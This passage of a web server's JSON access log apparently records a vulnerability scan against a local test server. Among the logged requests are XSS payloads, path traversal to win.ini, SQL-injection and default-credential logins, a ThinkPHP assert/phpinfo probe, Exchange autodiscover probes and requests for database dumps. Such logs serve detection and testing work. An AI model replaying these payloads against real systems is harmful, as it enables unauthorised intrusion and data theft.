HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/popups/UserPickerBrowser.jspa HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/device_graph_page.php?device_id=%22zlo%20onerror=alert(1)%20%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backup.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"29K6BUzjVgVEgGmIq2ssb0p16xa","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /testing-put.txt HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5chttp://127.0.0.1example.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/svnwebclient/error.jsp?errormessage=%27%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&description=test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hp/device/DeviceInformation/View HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/status.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /base_import/static/c:/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /testing-put.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-includes/rss-functions.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /irj/go/km/navigation/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../example.com HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /database.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"USERNAME=admin&PASSWORD=ofbiz&FTOKEN=&JavaScriptEnabled=Y","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /control/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/svnwebclient/statsItem.jsp?url=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.018","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ibmmq/console/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi2/status.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/static/c:/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"s=phpinfo()&_method=__construct&filter=assert","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /?s=index/index/index HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /data.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apisix/admin/migrate/export HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%2f/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=ultimate-maps-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /visualizza_tabelle.php?anno=2021&tipo_tabella=prenotazioni&sel_tab_prenota=tutte&wo03b%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ew5px3=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /base/static/c:/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /public/config.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%5cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db_backup.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SAPIrExtHelp/random/SAPIrExtHelp/random/%22%3e%3c%53%56%47%20%4f%4e%4c%4f%41%44%3d%26%23%39%37%26%23%31%30%38%26%23%31%30%31%26%23%31%31%34%26%23%31%31%36%28%26%23%78%36%34%26%23%78%36%66%26%23%78%36%33%26%23%78%37%35%26%23%78%36%64%26%23%78%36%35%26%23%78%36%65%26%23%78%37%34%26%23%78%32%65%26%23%78%36%34%26%23%78%36%66%26%23%78%36%64%26%23%78%36%31%26%23%78%36%39%26%23%78%36%65%29%3e.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D2+onerror%3Dalert%28document.domain%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sample-apps/hello/%2f/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PRESENTATION/HTML/TOP/PRTINFO.HTML HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"username=dw1%27+or+1%3D1+%23&password=dw1%27+or+1%3D1+%23&login=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /zms/admin/index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1/zms/admin/index.php", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /storia_soldi.php?piu17%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ee3esq=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /////%5C;@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dbdump.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mysql.initial.sql HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/clientlogin/?srid=&action=showdeny&url= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 